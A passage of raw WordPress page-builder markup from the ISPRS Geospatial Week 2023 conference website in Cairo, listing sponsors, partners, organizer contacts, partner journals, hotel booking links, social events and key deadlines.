10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 